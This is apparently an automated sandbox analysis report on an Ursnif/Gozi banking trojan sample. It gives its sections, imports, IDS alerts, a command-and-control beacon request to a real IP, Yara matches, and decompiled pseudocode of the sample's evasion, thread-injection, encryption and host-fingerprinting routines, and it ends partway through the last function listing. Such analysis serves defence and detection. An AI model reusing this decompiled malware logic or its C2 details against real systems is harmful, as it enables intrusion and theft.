IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1000	0x1000	False	0.718017578125	data	6.515539058364033	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2000	0x4c0	0x600	False	0.4635416666666667	data	4.488955985688776	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3000	0x194	0x200	False	0.056640625	data	0.12227588125913882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x4000	0x2dc	0x400	False	0.7607421875	data	6.3016514258390215	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5000	0x10	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6000	0x8000	0x7200	False	0.9710457785087719	data	7.859639070268769	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ntdll.dll	_snwprintf, memset, NtQuerySystemInformation, _aulldiv
KERNEL32.dll	GetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, WaitForSingleObject, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapCreate, HeapDestroy, GetCommandLineW, ExitProcess, SetLastError, TerminateThread, SleepEx, GetModuleFileNameW, CreateThread, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW, QueueUserAPC
ADVAPI32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorA

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.345.8.158.10449704802033204 10/06/22-12:30:02.562975	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49704	80	192.168.2.3	45.8.158.104

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 6, 2022 12:30:02.467928886 CEST	49704	80	192.168.2.3	45.8.158.104
Oct 6, 2022 12:30:02.562129974 CEST	80	49704	45.8.158.104	192.168.2.3
Oct 6, 2022 12:30:02.562357903 CEST	49704	80	192.168.2.3	45.8.158.104
Oct 6, 2022 12:30:02.562974930 CEST	49704	80	192.168.2.3	45.8.158.104
Oct 6, 2022 12:30:02.657660007 CEST	80	49704	45.8.158.104	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 6, 2022 12:28:42.239211082 CEST	58921	53	192.168.2.3	8.8.8.8
Oct 6, 2022 12:28:42.260540962 CEST	53	58921	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 6, 2022 12:28:42.239211082 CEST	192.168.2.3	8.8.8.8	0x9aad	Standard query (0)	trackingg-protectioon.cdn1.mozilla.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 6, 2022 12:28:42.260540962 CEST	8.8.8.8	192.168.2.3	0x9aad	Name error (3)	trackingg-protectioon.cdn1.mozilla.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

45.8.158.104

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49704	45.8.158.104	80	C:\Users\user\Desktop\sadf.exe

Timestamp	kBytes transferred	Direction	Data
Oct 6, 2022 12:30:02.562974930 CEST	118	OUT	GET /uploaded/OefU6cYu_/2Bh5eSBuW1HoOJMcO7vA/d7SIWeoRQwnGkilzDpQ/6dU8XqIZtXmxeiGmmCE64H/f1Nt6sF7IrG2P/R1VRcVzY/_2BT38Jx_2Fbr7v8to_2FLq/VG0YsHE8mG/n_2F2PKN3TdKATV_2/FTdVW4ur9Omp/jrWMtuTkF90/3KGyudEpayTHCC/YXqBDl4ORyiaSJOw9sN_2/Fdabc1TmxPXNvinn/JCaxgYaDxedKHZk/u146Q0qWggdX24am_2/BCgVA4PEZ/TXr3WTRz0EG0cXZKBsrD/1oC2dl2fycp/FBzL9h.pct HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 45.8.158.104 Connection: Keep-Alive Cache-Control: no-cache

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: sadf.exePID: 4968, Parent PID: 3452

General

Target ID:	0
Start time:	12:28:36
Start date:	06/10/2022
Path:	C:\Users\user\Desktop\sadf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\sadf.exe
Imagebase:	0x400000
File size:	37888 bytes
MD5 hash:	76EBBA129360AD5093F0FE66910EB06D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: sadf.exePID: 4968, Parent PID: 3452COMMON

Executed Functions

Function 00401493 Relevance: 27.2, APIs: 18, Instructions: 160
threadsleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00401493() {
				long _v8;
				char _v12;
				char _v16;
				void* _v40;
				long _t28;
				long _t30;
				long _t31;
				signed short _t33;
				void* _t37;
				long _t40;
				long _t41;
				void* _t48;
				intOrPtr _t50;
				signed int _t57;
				signed int _t58;
				long _t63;
				long _t65;
				intOrPtr _t66;
				void* _t71;
				void* _t75;
				signed int _t77;
				signed int _t78;
				void* _t82;
				intOrPtr* _t83;

				_t28 = E004012B0();
				_v8 = _t28;
				if(_t28 != 0) {
					return _t28;
				}
				do {
					_t77 = 0;
					_v12 = 0;
					_t63 = 0x30;
					do {
						_t71 = E0040181A(_t63);
						if(_t71 == 0) {
							_v8 = 8;
						} else {
							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
							_t67 = _t57;
							_t58 = _t57 & 0x0000ffff;
							_v8 = _t58;
							if(_t58 == 4) {
								_t63 = _t63 + 0x30;
							}
							_t78 = 0x13;
							_t10 = _t67 + 1; // 0x1
							_t77 =  *_t71 % _t78 + _t10;
							E0040147E(_t71);
						}
					} while (_v8 != 0);
					_t30 = E0040164B(_t77); // executed
					_v8 = _t30;
					Sleep(_t77 << 4); // executed
					_t31 = _v8;
				} while (_t31 == 0x15);
				if(_t31 != 0) {
					L30:
					return _t31;
				}
				_v12 = 0;
				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
				if(_t33 == 0) {
					__imp__GetSystemDefaultUILanguage();
					_t67 =  &_v12;
					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
				}
				if(_v12 == 0x5552) {
					L28:
					_t31 = _v8;
					if(_t31 == 0xffffffff) {
						_t31 = GetLastError();
					}
					goto L30;
				} else {
					if(E00401151(_t67,  &_v16) != 0) {
						 *0x403178 = 0;
						L20:
						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x403180, 0, 0); // executed
						_t82 = _t37;
						if(_t82 == 0) {
							L27:
							_v8 = GetLastError();
							goto L28;
						}
						_t40 = QueueUserAPC(E004011F6, _t82,  &_v40); // executed
						if(_t40 == 0) {
							_t65 = GetLastError();
							TerminateThread(_t82, _t65);
							CloseHandle(_t82);
							_t82 = 0;
							SetLastError(_t65);
						}
						if(_t82 == 0) {
							goto L27;
						} else {
							_t41 = WaitForSingleObject(_t82, 0xffffffff);
							_v8 = _t41;
							if(_t41 == 0) {
								GetExitCodeThread(_t82,  &_v8);
							}
							CloseHandle(_t82);
							goto L28;
						}
					}
					_t66 = _v16;
					_t83 = __imp__GetLongPathNameW;
					_t48 =  *_t83(_t66, 0, 0); // executed
					_t75 = _t48;
					if(_t75 == 0) {
						L18:
						 *0x403178 = _t66;
						goto L20;
					}
					_t22 = _t75 + 2; // 0x2
					_t50 = E0040181A(_t75 + _t22);
					 *0x403178 = _t50;
					if(_t50 == 0) {
						goto L18;
					}
					 *_t83(_t66, _t50, _t75); // executed
					E0040147E(_t66);
					goto L20;
				}
			}

0x00401499
0x0040149e
0x004014a3
0x0040164a
0x0040164a
0x004014ac
0x004014ac
0x004014b0
0x004014b3
0x004014b4
0x004014ba
0x004014be
0x004014f5
0x004014c0
0x004014c8
0x004014ce
0x004014d0
0x004014d5
0x004014db
0x004014dd
0x004014dd
0x004014e4
0x004014ea
0x004014ea
0x004014ee
0x004014ee
0x004014fc
0x00401503
0x0040150c
0x0040150f
0x00401515
0x00401518
0x00401521
0x00401646
0x00000000
0x00401648
0x00401534
0x00401537
0x0040153f
0x00401541
0x0040154c
0x00401554
0x00401554
0x00401562
0x00401638
0x00401638
0x0040163e
0x00401640
0x00401640
0x00000000
0x00401568
0x00401573
0x004015b1
0x004015b7
0x004015c9
0x004015cf
0x004015d3
0x0040162f
0x00401635
0x00000000
0x00401635
0x004015df
0x004015ed
0x004015f5
0x004015f9
0x00401600
0x00401603
0x00401605
0x00401605
0x0040160d
0x00000000
0x0040160f
0x00401612
0x00401618
0x0040161d
0x00401624
0x00401624
0x0040162b
0x00000000
0x0040162b
0x0040160d
0x00401575
0x0040157a
0x00401581
0x00401583
0x00401587
0x004015a9
0x004015a9
0x00000000
0x004015a9
0x00401589
0x0040158e
0x00401593
0x0040159a
0x00000000
0x00000000
0x0040159f
0x004015a2
0x00000000
0x004015a2

APIs

Part of subcall function 004012B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040149E), ref: 004012BF
Part of subcall function 004012B0: GetVersion.KERNEL32 ref: 004012CE
Part of subcall function 004012B0: GetCurrentProcessId.KERNEL32 ref: 004012EA
Part of subcall function 004012B0: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401303

Part of subcall function 0040181A: RtlAllocateHeap.NTDLL(00000000,?,004014BA,00000030,?,00000000), ref: 00401826

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004014C8
Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 0040150F
GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401537
GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401541
VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401554
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401581
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 0040159F
CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 004015C9
QueueUserAPC.KERNELBASE(004011F6,00000000,?,?,00000000), ref: 004015DF
GetLastError.KERNEL32(?,00000000), ref: 004015EF
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004015F9
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401600
SetLastError.KERNEL32(00000000,?,00000000), ref: 00401605
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401612
GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401624
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0040162B
GetLastError.KERNEL32(?,00000000), ref: 0040162F
GetLastError.KERNEL32(?,00000000), ref: 00401640

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
String ID:
API String ID: 3475612337-0
Opcode ID: fda34ba359e64ccf93289e306a0c7ba5ae66b60962868661fcd4dfbef77cc745
Instruction ID: af16b420b445b8790a0e43c51f3fc8c451078355e8a2a53fe19e92f811f25c67
Opcode Fuzzy Hash: fda34ba359e64ccf93289e306a0c7ba5ae66b60962868661fcd4dfbef77cc745
Instruction Fuzzy Hash: 3C51C671900614BBD721AFA58E88DAF7A7CEB44314F144137FA01F72E0D7788A01CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 008C47E5 Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E008C47E5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x8ca0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x8ca0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E008C7A71(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x8ca0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x8ca0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E008C789E(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x008c47ee
0x008c47f4
0x008c47f7
0x008c47fd
0x008c47fd
0x008c47ff
0x008c4801
0x008c4804
0x008c480a
0x008c480b
0x008c480c
0x008c4812
0x008c4817
0x008c481d
0x008c4825
0x008c4982
0x008c482b
0x008c482d
0x008c4836
0x008c483b
0x008c484d
0x008c4850
0x008c4854
0x008c485b
0x008c485f
0x008c4867
0x008c496d
0x008c486d
0x008c486d
0x008c4871
0x008c4872
0x008c4874
0x008c487f
0x008c4959
0x008c4885
0x008c4885
0x008c4888
0x008c488e
0x008c4894
0x008c4894
0x008c489c
0x008c489e
0x008c48a3
0x008c494a
0x008c48a9
0x008c48af
0x008c48b2
0x008c48b5
0x008c48b7
0x008c48b8
0x008c48bd
0x008c48bf
0x008c48bf
0x008c48c9
0x008c48ce
0x008c48d1
0x008c48d4
0x008c48d6
0x008c48df
0x008c4909
0x008c48e1
0x008c48f2
0x008c48f2
0x008c4911
0x00000000
0x00000000
0x008c4913
0x008c4916
0x008c4919
0x008c491d
0x00000000
0x008c491f
0x008c492e
0x008c4934
0x008c493c
0x008c493c
0x00000000
0x008c491d
0x008c4921
0x008c4927
0x008c492c
0x008c4943
0x00000000
0x00000000
0x00000000
0x008c492c
0x008c48a3
0x008c495c
0x008c495f
0x008c495f
0x008c4974
0x008c4974
0x008c498c

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,008C44FD,00000001,008C3831,00000000), ref: 008C481D
memcpy.NTDLL(008C44FD,008C3831,00000010,?,?,?,008C44FD,00000001,008C3831,00000000,?,008C22E5,00000000,008C3831,?,7491C740), ref: 008C4836
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 008C485F
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 008C4877
memcpy.NTDLL(00000000,7491C740,01309600,00000010), ref: 008C48C9
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,01309600,00000020,?,?,00000010), ref: 008C48F2
GetLastError.KERNEL32(?,?,00000010), ref: 008C4921
GetLastError.KERNEL32 ref: 008C4953
CryptDestroyKey.ADVAPI32(00000000), ref: 008C495F
GetLastError.KERNEL32 ref: 008C4967
CryptReleaseContext.ADVAPI32(?,00000000), ref: 008C4974
GetLastError.KERNEL32(?,?,?,008C44FD,00000001,008C3831,00000000,?,008C22E5,00000000,008C3831,?,7491C740,008C3831,00000000,01309600), ref: 008C497C

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID:
API String ID: 3401600162-0
Opcode ID: 527fbe10545d73e81aa7b8be70cd9fe955be692ab883d8b768c6eb993f3161e5
Instruction ID: d983ba166b699b12f1d4797387731f93f6dabc404355f4aa7dd4663471304535
Opcode Fuzzy Hash: 527fbe10545d73e81aa7b8be70cd9fe955be692ab883d8b768c6eb993f3161e5
Instruction Fuzzy Hash: 1D5127B190021DFFDB10DFA8DC88EAEBBB8FB04354F108429F915E6260D7708E589B61

Uniqueness

Uniqueness Score: -1.00%

Function 00401A49 Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401A49(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00401FFA();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x403184;
				_push(_t15 + 0x40405e);
				_push(_t15 + 0x404054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00401FF4();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x403188, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00401a49
0x00401a52
0x00401a56
0x00401a5c
0x00401a61
0x00401a66
0x00401a69
0x00401a6c
0x00401a71
0x00401a72
0x00401a75
0x00401a80
0x00401a87
0x00401a8b
0x00401a8d
0x00401a8e
0x00401a91
0x00401a96
0x00401aa0
0x00401aa2
0x00401aa2
0x00401ab6
0x00401abc
0x00401ac0
0x00401b10
0x00401ac2
0x00401acb
0x00401ae1
0x00401ae9
0x00401afb
0x00401aff
0x00000000
0x00000000
0x00401aeb
0x00401aee
0x00401af3
0x00401af5
0x00401af5
0x00401ad6
0x00401ad8
0x00401b01
0x00401b02
0x00401b02
0x00401acb
0x00401b18

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?,?), ref: 00401A56
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401A6C
_snwprintf.NTDLL ref: 00401A91
CreateFileMappingW.KERNELBASE(000000FF,00403188,00000004,00000000,?,?), ref: 00401AB6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?), ref: 00401ACD
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401AE1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?), ref: 00401AF9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A), ref: 00401B02
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?), ref: 00401B0A

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: d777c09a78f82427ffff02114adef762b53d280cb3579f302ddc5db8f904bf6f
Instruction ID: 1ca23827cf46cf4e4b48cd91b4d32e6437ca3dc37cb5e0f42cf8925e636595e9
Opcode Fuzzy Hash: d777c09a78f82427ffff02114adef762b53d280cb3579f302ddc5db8f904bf6f
Instruction Fuzzy Hash: 3B21A1B2600204BBDB11AFA8CD88E9F37BDEB48351F11403AF605F61E0D7B45945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 008C54EC Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E008C54EC(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x8ca310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E008C3B9D( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x8ca344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x8ca2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E008C7194(_v8 + _v8, _t64);
							}
							HeapFree( *0x8ca2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x8ca2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E008C7194(_v8 + _v8, _t64);
						}
						HeapFree( *0x8ca2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x008c54ec
0x008c54f4
0x008c54f8
0x008c54fb
0x008c5500
0x008c5502
0x008c5507
0x008c5507
0x008c550d
0x008c550f
0x008c551c
0x008c557d
0x008c551e
0x008c5523
0x008c5529
0x008c552e
0x008c553c
0x008c5540
0x008c554f
0x008c5556
0x008c555d
0x008c555d
0x008c5568
0x008c5568
0x008c5540
0x008c552e
0x008c557f
0x008c5585
0x008c558f
0x008c5591
0x008c5596
0x008c55a5
0x008c55a9
0x008c55b4
0x008c55bb
0x008c55c2
0x008c55c2
